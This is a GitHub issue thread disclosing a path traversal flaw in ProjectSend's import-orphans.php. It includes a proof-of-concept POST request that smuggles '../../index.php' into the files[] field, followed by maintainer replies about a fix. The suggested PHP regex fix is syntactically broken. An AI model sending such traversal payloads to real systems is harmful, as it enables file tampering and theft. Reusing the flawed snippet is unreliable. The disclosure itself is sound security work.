Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Path Traversal vulnerability in import-orphans.php #994

Open
KietNA-HPT opened this issue Sep 7, 2021 · 16 comments
Open

Path Traversal vulnerability in import-orphans.php #994

KietNA-HPT opened this issue Sep 7, 2021 · 16 comments

Comments

@KietNA-HPT
Copy link

KietNA-HPT commented Sep 7, 2021

Dear @ignacionelson ,
I found a Path traversal vulnerability in import-orphans.php

Description

Becase of lacking sanitization input for files[] parameter, The attacker can add ../ to move all of php files or any file on the system that has permissions to /upload/files/ folder

image

Step To Reproduce

  1. Using burpsuite tool to capture request of import-orphans.php function
  2. Adding ../../[file name want to move] in files[] parameter, in this step the attacker can move php files with the aim of sabotaging the system or read sentitive file in system like passwd, access log, ...
  3. Then access webroot/import-orphans.php to get a new name of file
    image
  4. Then access webroot/upload/files/[new name of file]

Request move index.php file

POST /import-orphans.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------41162972056717011663508504951
Content-Length: 388
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/import-orphans.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;
Upgrade-Insecure-Requests: 1

-----------------------------41162972056717011663508504951
Content-Disposition: form-data; name="csrf_token"

ccc780a3231d3f7544fe9eaa9f3aea28756bdbfd1df824b726865ebaf1505fa1
-----------------------------41162972056717011663508504951
Content-Disposition: form-data; name="files[]"

../../index.php
-----------------------------41162972056717011663508504951--

image

Then webroot returned Directory Listing because of moving index.php file to /upload/files folder
image

Solution:

if(preg_match('/.\.\/',$_POST['files'] === 1){
                  die();
}
@shorefall
Copy link

Nice find!

@KietNA-HPT
Copy link
Author

Nice find!

Thank you very much,
But i think it's just a small bug

@tazmanboo
Copy link

tazmanboo commented Nov 6, 2021

I am not a programmer, just a user. Is this the same as this issue:

"Projectsend version r1295 is affected by a directory traversal vulnerability. Because of lacking sanitization input for files[] parameter, an attacker can add ../ to move all PHP files or any file on the system that has permissions to /upload/files/ folder.
Publish Date : 2021-10-11 Last Update Date : 2021-10-18"
This is the site that discusses the issue https://www.cvedetails.com/cve/CVE-2021-40887/.

If so,would you mind giving step-by-step instructions on how to solve this? We have a small non-profit and with this program our clients can upload their files to us. We need them to be secure. Thank you in advance.

@ignacionelson
Copy link
Collaborator

I'll implement the fix ASAP and try to get the new release out this week, which is focused on security fixes

@kkplein
Copy link

kkplein commented Nov 7, 2021

Thank you, that is very much needed and appreciated.

@tazmanboo
Copy link

Thank you.

@kkplein
Copy link

kkplein commented Nov 18, 2021

I'll implement the fix ASAP and try to get the new release out this week, which is focused on security fixes

Can you already say when we can expect this security-focused release?

@ignacionelson
Copy link
Collaborator

@kkplein I'm working on adding recaptcha to the login form. That should be up today or tomorrow, and a release will follow a few days later after testing. Would you like to test it out before releasing?

@kkplein
Copy link

kkplein commented Nov 18, 2021

Sure!

@ignacionelson
Copy link
Collaborator

r1330 beta

@kkplein I wasn't able to fully implement recaptcha for the login for yet, but the rest should all be ok. I'd really appreciate if you can test this version out. Thank you!!

@kkplein
Copy link

kkplein commented Nov 19, 2021

@ignacionelson I just downloaded, copied to the ps root folder, unzippd -o, logged on to the system, and everything worked perfectly. The system logged the upgrade in the activity log (masteruser updated ProjectSend to version 1330)
I clicked through all the menu's, downloaded some sample files, etc. All seems to work just fine.
Is there anyhing particular you'd like me to check?

@ignacionelson
Copy link
Collaborator

@kkplein Thanks!!
I see on the other issue that the files list problem was solved in your case.
Normal usage is a good way to test :)

@kkplein
Copy link

kkplein commented Nov 20, 2021

Good. Curiosa about others testing this. Are all known security issues solved in this release?

@ChadAragorn
Copy link

@ignacionelson I'm just wondering if that fix for the directory traversal was ever implemented. I'm running r1335 and the proposed change above doesn't appear to be in place; I'm not a php dev though so I'm not 100% sure that it hasn't been fixed.

@ignacionelson
Copy link
Collaborator

50fc348
The applied solution is different but should produce the same result

@ChadAragorn
Copy link

Okay that's wonderful, thank you for the update. Could this issue be closed then?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

6 participants